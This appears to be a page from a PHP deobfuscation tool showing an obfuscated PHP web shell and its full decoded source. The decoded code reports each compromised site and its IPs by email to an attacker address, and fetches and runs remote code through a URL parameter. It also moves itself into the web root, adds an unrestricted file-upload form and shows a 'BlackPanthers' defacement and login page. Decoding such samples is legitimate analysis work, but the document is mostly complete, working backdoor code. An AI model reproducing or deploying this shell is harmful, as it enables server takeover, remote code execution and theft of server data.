Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(str_rot13(base64_decode('rRh4ZtpV8vO6yv9urPgidgMSadZbCa/1C8fc2sEHOEp..
Decoded Output download
set_time_limit(0);
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Setoran Shells
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF BlackPanthers";}
else {$security= "SAFE_MODE = ON Bad";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
$_SESSION['bajak'] = 1;
}else{
$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti = $_SERVER['DOCUMENT_ROOT'].'/'.'style.php';
rename($source, $desti);
}
$site = $_GET['url'];
$cek = file_get_contents("$site");
eval(gzinflate(base64_decode($cek)));
echo "<title>anaLTEAM</title><br>";
if(isset($_GET['cek'])){
echo "Simple Injektor</br></br>";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF anaLTEAM";}
else {$security= "SAFE_MODE : ON Bad";}
echo "<font size=5 color=yellow>anaLTEAM<br>";
echo "<font size=3 color=white>Status : Cogiendo.<br><br>";
echo "<font size=2 color=red><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#64D300><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#64D300><b>Uname : ".php_uname()."</b><br>";
}
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
$files = @$_FILES["files"];
if ($files["name"] != '') {
$fullpath = $_REQUEST["path"] . $files["name"];
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
}
}
if(isset($_GET['colek'])){
echo '<html><head><title>Upload files</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
}
?>
<html>
<head>
<title>BlackPanthers</title>
</head>
<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
<b><font color="#000080" size="2">#</font></b></td>
<td bgcolor="#000080"><font face="Verdana" size="2" color="#009900"><b>CGI-Telnet BlackPanthers Team Connected to the server</b></font></td>
</tr>
<tr>
<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
</font></td>
</tr>
</table>
<font color="#009900" size="3">
<body bgcolor=black>
<pre><font color="#ff0000"> _____ _____ _____ _____ _ _
/ __ \| __ \|_ _| |_ _| | | | |
| / \/| | \/ | | ______ | | ___ | | _ __ ___ | |_
| | | | __ | | |______| | | / _ \| || '_ \ / _ \| __|
| \__/\| |_\ \ _| |_ | | | __/| || | | || __/| |_
\____/ \____/ \___/ \_/ \___||_||_| |_| \___| \__| 2.0
</font><font color="#FF0000"> ______ </font><font color="#AE8300"> 2019, BLACK-P Team</font><font color="#FF0000">
.-" "-.
/ BlackP | |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \</font><font color="#009900">_______</font><font color="#FF0000">\</font><font color="#009900">__</font><font color="#FF0000">|*EVIL*|</font><font color="#009900">__</font><font color="#FF0000">/</font><font color="#009900">_______________________
</font><font color="#FF0000"> (_)</font><font color="#009900">@8@8</font><font color="#FF0000">{}</font><font color="#009900"><________</font><font color="#FF0000">|-\MASTER/-|</font><font color="#009900">________________________></font><font color="#FF0000">
)_/ \ /
(@ `--------`
</font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
<code>
<form name="f" method="POST" action="admin">
<input type="hidden" name="a" value="login">
login: admin<br>
password:<input type="password" name="p">
<input type="submit" value="Enter">
</form>
</code>
<script language="JavaScript">
var text ="<b>I'm<b> <i>just a creature who always wanted to learn, I'm not a </i><b>HACKER</b>.<i> I'm also not a destroyer !!! <br><b>I just wanted to show the ugliness of YOUR own system that you be not careless </b></i>..</br><b> I HOPE YOU GOT LOVE </b>:)";
var delay=50;
var currentChar=5;
var destination="[none]";
function type()
{
//if (document.all)
{
var dest=document.getElementById(destination);
if (dest)// && dest.innerHTML)
{
dest.innerHTML=text.substr(0, currentChar)+"<blink>_</blink>"; currentChar++;
if (currentChar>text.length)
{
currentChar=1;
setTimeout("type()", 5000);
}
else
{
setTimeout("type()", delay);
}
}
}
}
function startTyping(textParam, delayParam, destinationParam)
{
text=textParam;
delay=delayParam;
currentChar=5;
destination=destinationParam; type();
}
</script> <b>
<div 0px="" 12px="" arial="" color:="" ff0000="" font:="" id="textDestination" margin:="" style="background-color: none; color: #00ff00; text-align: center; font-family: arial; font-size: 30px"></div></b> <script language="JavaScript"> javascript:startTyping(text, 50, "textDestination"); </script>
</head>
</html>
Did this file decode correctly?
Original Code
<?php
eval(gzinflate(str_rot13(base64_decode('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'))));
?>
Function Calls
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 1 |
Stats
MD5 | 1a8378d2b0fe84528a307f0b32111faa |
Eval Count | 1 |
Decode Time | 54 ms |